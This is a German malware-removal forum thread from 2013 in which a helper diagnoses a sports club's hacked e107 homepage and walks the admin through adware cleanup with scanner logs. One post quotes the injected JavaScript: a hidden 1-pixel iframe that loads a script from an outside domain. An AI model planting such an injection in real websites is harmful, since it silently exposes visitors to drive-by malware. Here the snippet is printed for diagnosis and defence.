Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung
Java Script Virus JS/EXP.Redir.EL.7

Java Script Virus JS/EXP.Redir.EL.7


Plagegeister aller Art und deren Bekämpfung: Java Script Virus JS/EXP.Redir.EL.7

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Seite 1 von 2 1 2
Alt 11.06.2013, 09:23   #1
crucru1995
 
Java Script Virus JS/EXP.Redir.EL.7 - Standard

Java Script Virus JS/EXP.Redir.EL.7


Hallo Zusammen,

seit gestern habe ich das Problem das ich nicht mehr auf unsere Homepage (www.sportschuetzen-oberhausen-1995ev.de) komme. Ich bin dort Admin und dauerhaft eingelogt.

Ich bekomme den Hinweis

In den HTTP-Daten der angeforderten Seite wurde ein Virus oder ein unerwünschtes Programm gefunden.

Angeforderte URL: Home - Sportschützen Oberhausen 1995 e.v.
Information: Enthält Erkennungsmuster des Java-Scriptvirus JS/EXP.Redir.EL.7

angezeigt.

Ich habe auf meinem Hauptrechner Java auf Verdacht deinstalliert, welches das Problem nicht behoben hat. Selbst vom Laptop aus bekomme ich diesen Hinweis, aber die Seite wird mir als Gast dennoch angezeigt.

Ich habe mit Avira einen Scan durchlaufen lassen, mit dem Ergebnis drei Funde siehe Anlage!

Ich habe unseren Provider von 1blu auch schon angeschrieben, warte aber noch auf Antwort.

Bitte habt Verständnis das ich mich im Bereich EDV sehr wenig auskenne und nicht alles verstehen bzw. sofort umsetzen kann, hoffe aber dennoch auf Hilfe.

Viele Grüße
Christine
Miniaturansicht angehängter Grafiken
Java Script Virus JS/EXP.Redir.EL.7-scan.jpg  

Alt 11.06.2013, 09:37   #2
t'john
/// Helfer-Team
 
Java Script Virus JS/EXP.Redir.EL.7 - Standard

Java Script Virus JS/EXP.Redir.EL.7




Log von Antivir so erstellen: http://www.trojaner-board.de/125889-...en-posten.html
__________________

__________________
Alt 11.06.2013, 10:02   #3
crucru1995
 
Java Script Virus JS/EXP.Redir.EL.7 - Standard

Java Script Virus JS/EXP.Redir.EL.7


Hallo t'john,

ich hoffe ich habe Dich richtig verstanden.

Als Anhang.

Gruß
Christine
__________________
Alt 11.06.2013, 10:55   #4
t'john
/// Helfer-Team
 
Java Script Virus JS/EXP.Redir.EL.7 - Standard

Java Script Virus JS/EXP.Redir.EL.7


Benutzt du fuer die Seite ein CMS?


Es wird ein iframe eingeschleust:

Code:
ATTFilter
 function zzzfff() {
     var zeaqn = document.createElement('iframe');

     zeaqn.src = 'hxxp://monika-linsz.de/count.php';
     zeaqn.style.position = 'absolute';
     zeaqn.style.border = '0';
     zeaqn.style.height = '1px';
     zeaqn.style.width = '1px';
     zeaqn.style.left = '1px';
     zeaqn.style.top = '1px';

     if (!document.getElementById('zeaqn')) {
         document.write('<div id=\'zeaqn\'></div>');
         document.getElementById('zeaqn').appendChild(zeaqn);
Code:
ATTFilter
<link rel="stylesheet" type="text/css" href="/e107_plugins/log/log.php?lv=cmVmZXJlcj0mY29sb3VyPTI0JmVzZWxmPWh0dHA6Ly93d3cuc3BvcnRzY2h1ZXR6ZW4tb2JlcmhhdXNlbi0xOTk1ZXYuZGUvcGFnZS5waHA/NiZyZXM9MTE3Nng4ODU=">
__________________
Mfg, t'john
Das TB unterstützen

Alt 11.06.2013, 11:42   #5
crucru1995
 
Java Script Virus JS/EXP.Redir.EL.7 - Standard

Java Script Virus JS/EXP.Redir.EL.7


Ich kan mit dem Ausdruck CMS leider nichts anfangen und mit iFrame leider auch nicht.

Ich habe die HP über e107 erstellt.

Vllt. hilft Dir das weiter.

Gruß
Christine


Alt 11.06.2013, 15:19   #6
t'john
/// Helfer-Team
 
Java Script Virus JS/EXP.Redir.EL.7 - Standard

Java Script Virus JS/EXP.Redir.EL.7


e107 ist ein CMS.

du hast es anscheinend nicht gepflegt/upgedated sodass dritte code einschleusen konnten.

Du wirst das CMS Neuaufsetzen muessen.
__________________
--> Java Script Virus JS/EXP.Redir.EL.7

Alt 11.06.2013, 18:25   #7
crucru1995
 
Java Script Virus JS/EXP.Redir.EL.7 - Standard

Java Script Virus JS/EXP.Redir.EL.7


Hallo t'john,

wenn ich das jetzt richtig verstehe, ich muss den Rechner neu aufsetzen????

Tut mit leid, aber Bitte nicht schon wieder wir hatten erst im April einen Virus auf der HP einen Trojaner ganz böse, den habe ich auch nur weg bekommen indem wir die HP neu aufgesetzt und dann den Rechner neu aufgesetzt haben.

Kannst Du mir Bitte sagen, wie ich sowas in Zukunft pflegen oder updaten kann?

Vielen Dank
Gruß
Christine

Alt 12.06.2013, 09:15   #8
t'john
/// Helfer-Team
 
Java Script Virus JS/EXP.Redir.EL.7 - Standard

Java Script Virus JS/EXP.Redir.EL.7


Nicht deinen Rechner!

Den Server auf dem die Homepage liegt!!!

Dein Rechner hat wahrscheinlich nichts!

Downloade dir bitte Malwarebytes Anti-Rootkit Malwarebytes Anti-Rootkit und speichere es auf deinem Desktop.
  • Starte bitte die mbar.exe.
  • Folge den Anweisungen auf deinem Bildschirm gemäß Anleitung zu Malwarebytes Anti-Rootkit
  • Aktualisiere unbedingt die Datenbank und erlaube dem Tool, dein System zu scannen.
  • Klicke auf den CleanUp Button und erlaube den Neustart.
  • Während dem Neustart wird MBAR die gefundenen Objekte entfernen, also bleib geduldig.
  • Nach dem Neustart starte die mbar.exe erneut.
  • Sollte nochmal was gefunden werden, wiederhole den CleanUp Prozess.
Das Tool wird im erstellten Ordner eine Logfile ( mbar-log-<Jahr-Monat-Tag>.txt ) erzeugen. Bitte poste diese hier.

Starte keine andere Datei in diesem Ordner ohne Anweisung eines Helfers
__________________
Mfg, t'john
Das TB unterstützen

Alt 12.06.2013, 09:55   #9
crucru1995
 
Java Script Virus JS/EXP.Redir.EL.7 - Standard

Java Script Virus JS/EXP.Redir.EL.7


Sorry, das ich das mit dem neu aufsetzen und der Verlinkung falsch gedeutet habe.

Ich bin den Anweisungen gefolgt:

Malwarebytes Anti-Rootkit BETA 1.06.0.1003
www.malwarebytes.org

Database version: v2013.06.12.02

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 10.0.9200.16576
Crucru :: CRUCRU-PC [administrator]

12.06.2013 10:39:24
mbar-log-2013-06-12 (10-39-24).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUM | P2P
Scan options disabled: Deep Anti-Rootkit Scan | PUP
Objects scanned: 230202
Time elapsed: 7 minute(s), 8 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 2
c:\Users\Crucru\AppData\Local\Temp\DM\zNQjkZSp4icZoF5\DomaIQ.exe (Adware.DomaIQ) -> Delete on reboot.
c:\Users\Crucru\AppData\Local\Temp\DM\zNQjkZSp4icZoF5\DomaIQ10.exe (Adware.DomaIQ) -> Delete on reboot.

Physical Sectors Detected: 0
(No malicious items detected)

(end)


Und ich habe auch noch mal aus dem Avira den Log kopiert, da ich jetzt einen anderen Fehler angezeigt bekomme.

Danke

Alt 12.06.2013, 11:44   #10
t'john
/// Helfer-Team
 
Java Script Virus JS/EXP.Redir.EL.7 - Standard

Java Script Virus JS/EXP.Redir.EL.7


Kein Problem.

Dein Rechner hat nichts. Nur Adware.

Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
Bitte lade Junkware Removal Tool auf Deinen Desktop

  • Starte das Tool mit Doppelklick. Ab Windows Vista (oder höher) bitte mit Rechtsklick "als Administrator ausführen" starten.
  • Drücke eine beliebige Taste, um das Tool zu starten.
  • Je nach System kann der Scan eine Weile dauern.
  • Wenn das Tool fertig ist wird das Logfile (JRT.txt) auf dem Desktop gespeichert und automatisch geöffnet.
  • Bitte poste den Inhalt der JRT.txt in Deiner nächsten Antwort.

__________________
Mfg, t'john
Das TB unterstützen

Alt 12.06.2013, 13:18   #11
crucru1995
 
Java Script Virus JS/EXP.Redir.EL.7 - Standard

Java Script Virus JS/EXP.Redir.EL.7


da bin ich wieder...ist doch schon mal ein gutes Zeichen, das es nicht mein Rechner ist.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 4.9.4 (05.06.2013:1)
OS: Windows 7 Home Premium x64
Ran by Crucru on 12.06.2013 at 13:02:41,80
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services

Successfully stopped: [Service] sprotection
Successfully deleted: [Service] sprotection



~~~ Registry Values

Successfully deleted: [Registry Value] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\iminent
Successfully deleted: [Registry Value] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\iminentmessenger
Successfully repaired: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\\DefaultScope



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\babylon
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\babylontoolbar
Failed to delete: [Registry Key] HKEY_CURRENT_USER\Software\datamngr
Failed to delete: [Registry Key] HKEY_LOCAL_MACHINE\Software\datamngr
Failed to delete: [Registry Key] HKEY_CURRENT_USER\Software\datamngr_toolbar
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\iminent
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\iminent
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Umbrella
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\appid\genericasktoolbar.dll
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\appid\iminent.webbooster.internetexplorer.dll
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\genericasktoolbar.toolbarwnd
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\genericasktoolbar.toolbarwnd.1
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.business.tinyfying.downloadargs
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.business.tinyfying.linktopromoteargs
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.business.tinyfying.rawdataargs
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.business.tinyfying.tinyurlargs
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.business.tinyfying.virallinkargs
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.clientcallback
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.contractbase
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.addtousercontentcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.checkloginstatuscommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.cleancachecommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.gameovercallback
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.getcreditcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.getinstallationcontextcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.getloginstatuscommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.getloginstatusresult
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.getvariablecommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.getvariableresult
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.installationcontextresult
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.loadcontentcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.loadcontentcommandresult
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.logincommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.loginstatuschangedcallback
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.logoutcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.mergeidentitycommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.myaccountcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.playcontentcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.postcontentcallback
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.recycleviewscommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.setvariablecommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.showbrowserwindowcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.showcontrolcentercommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.showpluginwindowcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.testcontentcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.usercontentchangedcallback
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.variablechangedcallback
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.warmupcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.welcomecommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.servercommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.serverresult
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.lightcontent
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.lighturi
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.mediatorserviceproxy
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminentwebbooster.activecontenthandle.1
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminentwebbooster.activecontenthandler
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminentwebbooster.browserhelperobject
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminentwebbooster.browserhelperobject.1
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminentwebbooster.scriptextender
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminentwebbooster.scriptextender.1
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminentwebbooster.tinyurlhandler
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminentwebbooster.tinyurlhandler.1
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\installer\features\a28b4d68debaa244eb686953b7074fef
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\installer\products\a28b4d68debaa244eb686953b7074fef
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\installer\upgradecodes\f928123a039649549966d4c29d35b1c9
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\prod.cap
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\scripthost.tool
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\scripthost.tool.1
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\tracing\iminent_rasapi32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\tracing\iminent_rasmancs
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\tracing\mybabylontb_rasapi32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\tracing\mybabylontb_rasmancs
Failed to delete: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\datamngr
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{59C0C5BD-2579-433A-BBB8-AFFD59642BAF}
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A09AB6EB-31B5-454C-97EC-9B294D92EE2A}



~~~ Files



~~~ Folders

Successfully deleted: [Folder] "C:\ProgramData\babylon"
Successfully deleted: [Folder] "C:\ProgramData\iminent"
Successfully deleted: [Folder] "C:\Users\Crucru\AppData\Roaming\babylon"
Successfully deleted: [Folder] "C:\Users\Crucru\AppData\Roaming\iminent"
Successfully deleted: [Folder] "C:\Users\Crucru\appdata\locallow\delta"
Successfully deleted: [Folder] "C:\Program Files (x86)\happylyrics"
Successfully deleted: [Folder] "C:\Program Files (x86)\iminent"
Successfully deleted: [Folder] "C:\Program Files (x86)\Common Files\umbrella"
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{0F4423E4-61F2-4D7B-A34F-48158937BF39}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{100F4DB1-9F02-4055-874C-025C36CAA0D7}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{13F35A01-5094-43BE-A681-524599E10BB5}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{203003BA-52EB-4D18-AC51-C102A56591CC}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{20484978-99BE-4FDB-A868-99215C4029E5}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{20A96827-5824-4E81-9768-4C78DC7C8ECC}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{26E936EB-1F06-45FE-B5EE-3E1D78B0D202}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{2A345F30-4410-4F85-84C0-BC3E4B503209}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{2CD360A4-5063-4EA5-8A6C-4E8763D7F386}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{30728ADA-B6BD-4E57-A3DF-BAE62C413002}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{35AA7468-198E-4225-A861-C76631437C6B}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{3712C69C-292E-4C97-BE88-F2AA7D13E82D}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{3C493635-4F4F-40B9-B1F1-179404B609FB}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{3E289396-67E2-4E8B-B26E-0531D35092BD}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{426F41B9-34CD-47DD-9C81-8F6CA2937701}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{437BB3E3-3F78-4DDC-8F9D-6E6A867C7715}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{44818AE5-F279-48C2-AB4B-36D97485C3E4}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{456C0A65-6A7B-451E-9082-FA5A8229294F}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{4636220C-9130-426D-8A80-4ED9AE426A87}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{48075AE3-8732-43FA-B8BE-2ADDE61A4F5D}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{51D474EA-9506-4882-B028-1A650C398568}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{54CAF7AE-C1E2-4A02-811D-3FCF17EB573D}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{578F065F-E305-49C2-A5E8-E80934CE3F92}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{58D80EAE-B09C-4310-AD82-C3DEBAB2DEA2}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{59397296-57EA-483F-9E58-92B6EE2C80F4}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{5969087F-6BB3-4520-8626-025DCD12B400}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{5F37705C-A686-4E49-A60C-372D59A8266E}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{5FDCF00C-4F3A-45AD-A61D-2CC3F918E0F6}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{60A5B40A-CE21-4F3B-B36F-FDCC2DA7E6E5}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{635C435D-16A0-4CF1-8299-58CCE73DF3A1}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{6C7AC951-62C8-43A8-962B-2AD1007B4EE9}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{6DF98D28-C4D8-414D-A934-F79B2FDF8FEB}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{725C9019-4D6D-4252-A64F-C2C19360C59C}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{76EFD30E-8CDB-4EAE-9236-E3515E75D803}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{7CE134AC-1FE2-4739-AC58-00E932E7F4A5}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{8132D669-ECDD-4A2D-BA21-51D2A56AAB50}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{831F7A45-91BA-4C88-BB36-2EF5656983DB}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{86180BC2-6840-44DF-8E80-7EAAB20FD3BE}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{864B6E52-4E0F-43CA-BB20-96DBF0F191A5}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{88B14E7A-58D9-42B7-940F-1AAFCE3EBE18}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{9DCC2325-DFF0-4964-B0E8-424752854E00}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{A32D0FD9-EAEE-48BF-BE38-7EAA3B8ED444}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{ABFD14FC-69B5-45B2-8CB3-7C40ED1A7A3F}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{AF3F9E97-8B00-4C62-9886-8BA0B71307E7}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{AFCF0209-CAA7-47C7-8F89-86FD5CE373D2}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{B1188BEB-D6E4-4D3D-8F32-7E5AA10FA355}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{B15DA506-6049-4A91-85DC-DC87AD1776E4}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{B377908C-F7D9-4DD1-BD0D-12E2B9854148}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{BB06E73C-84E2-42E5-A62F-F25082E0B007}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{BBD263AA-9BB6-40F0-9F5A-213F2B0C1796}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{BC82F99D-CDCA-48E8-AD0C-A7FA36D417D7}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{BD0845CC-8DCC-43D5-89FE-9A0509D2169F}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{BE57C8DB-FD2A-4B44-8963-CE12D0FED55B}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{C957F622-EF43-4B9D-BA65-098525F25DE6}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{CC1321E7-EF5D-4075-9380-729B47ECB556}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{DB1202AF-801D-43C5-BF4D-50B2414DC289}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{DCCA342F-9B33-456A-A154-1AC9BE478266}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{FDA4F607-C6D2-4982-B278-0231E9C3F022}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{FE0DEB5E-13AA-458A-B3C6-7CD1EDD5F95E}
Successfully deleted: [Empty Folder] C:\Users\Crucru\appdata\local\{FE999BE7-32CD-493C-B895-130CA35E5395}



~~~ FireFox

Successfully deleted: [File] C:\Users\Crucru\AppData\Roaming\mozilla\firefox\profiles\844091ak.default\user.js
Successfully deleted: [File] C:\Users\Crucru\AppData\Roaming\mozilla\firefox\profiles\844091ak.default\invalidprefs.js
Successfully deleted: [File] C:\Users\Crucru\AppData\Roaming\mozilla\firefox\profiles\844091ak.default\searchplugins\babylon.xml
Successfully deleted: [File] C:\Users\Crucru\AppData\Roaming\mozilla\firefox\profiles\844091ak.default\searchplugins\delta.xml
Successfully deleted: [Registry Value] HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\Extensions\\webbooster@iminent.com
Successfully deleted the following from C:\Users\Crucru\AppData\Roaming\mozilla\firefox\profiles\844091ak.default\prefs.js

user_pref("extensions.delta.admin", false);
user_pref("extensions.delta.aflt", "babsst");
user_pref("extensions.delta.appId", "{C26644C4-2A12-4CA6-8F2E-0EDE6CF018F3}");
user_pref("extensions.delta.autoRvrt", "false");
user_pref("extensions.delta.dfltLng", "en");
user_pref("extensions.delta.excTlbr", false);
user_pref("extensions.delta.ffxUnstlRst", true);
user_pref("extensions.delta.id", "ccb4af2c000000000000c860008c6cfe");
user_pref("extensions.delta.instlDay", "15832");
user_pref("extensions.delta.instlRef", "sst");
user_pref("extensions.delta.newTab", false);
user_pref("extensions.delta.prdct", "delta");
user_pref("extensions.delta.prtnrId", "delta");
user_pref("extensions.delta.rvrt", "false");
user_pref("extensions.delta.smplGrp", "none");
user_pref("extensions.delta.tlbrId", "base");
user_pref("extensions.delta.tlbrSrchUrl", "");
user_pref("extensions.delta.vrsn", "1.8.16.16");
user_pref("extensions.delta.vrsnTs", "1.8.16.1615:19:25");
user_pref("extensions.delta.vrsni", "1.8.16.16");
Emptied folder: C:\Users\Crucru\AppData\Roaming\mozilla\firefox\profiles\844091ak.default\minidumps [12 files]



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 12.06.2013 at 13:05:54,99
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Alt 12.06.2013, 15:58   #12
t'john
/// Helfer-Team
 
Java Script Virus JS/EXP.Redir.EL.7 - Standard

Java Script Virus JS/EXP.Redir.EL.7


ok.

Downloade dir bitte aswMBR.exe und speichere die Datei auf deinem Desktop.
  • Starte die aswMBR.exe - (aswMBR.exe Anleitung)
    Ab Windows Vista (oder höher) bitte mit Rechtsklick "als Administrator ausführen" starten".
  • Das Tool wird dich fragen, ob Du mit der aktuellen Virendefinition von AVAST! dein System scannen willst. Beantworte diese Frage bitte mit Ja. (Sollte deine Firewall fragen, bitte den Zugriff auf das Internet zulassen )
    Der Download der Definitionen kann je nach Verbindung eine Weile dauern.
  • Klicke auf Scan.
  • Warte bitte bis Scan finished successfully im DOS-Fenster steht.
  • Drücke auf Save Log und speichere diese auf dem Desktop.
Poste mir die aswMBR.txt in deiner nächsten Antwort.

